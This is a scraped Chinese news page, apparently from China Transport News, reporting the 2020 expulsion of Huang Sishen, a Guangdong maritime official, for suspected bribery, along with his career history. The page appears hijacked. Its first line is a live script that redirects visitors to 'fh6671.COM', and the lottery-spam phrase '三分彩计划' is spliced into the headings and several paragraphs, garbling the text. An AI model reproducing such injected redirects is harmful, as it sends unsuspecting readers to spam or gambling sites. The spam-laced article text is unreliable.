function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 任免

三分彩计划广东海事局原党组成员、副局长黄斯深

严重违纪违法被开除党籍、开除公职

2020-11-09 15:05:49 来源:中央纪委国家监委 作者:

据中央纪委国家监委驻交通运输部纪检监察组、南京市纪委监委消息:

三分彩计划日前,中央纪委国家监委驻交通运输部纪检监察组、南京市纪委监委对广东海事局原党组成员、副局长黄斯深严重违纪违法问题进行了纪律审查和监察调查。

经查,黄斯深违反政治纪律,涉嫌受贿犯罪。决定给予黄斯深开除党籍、开除公职处分;收缴其违纪违法所得;其涉嫌犯罪问题移送检察机关依法审查起诉,所涉财物随案移送。

简历

黄斯深,男,1964年5月生,汉族,广东潮州人,大学本科学历,1983年8月参加工作,1985年6月加入中国共产党。

1983年8月集美航海专科学校毕业后到国家海洋局南海分局工作;

1998年5月至2000年11月历任珠海海监局党组成员、副局长、副监督长(副处级);

2000年11月任珠海海事局党组成员、副局长;

2006年12月任广东海事局通航管理处处长;

2010年10月任珠海海事局党组副书记、局长(正处级);

2016年1月任广州海事局党组副书记、局长;

2018年5月任广东海事局党组成员、副局长(副局级);

三分彩计划2020年1月20日被免去广东海事局党组成员、副局长职务。

中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

三分彩计划围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。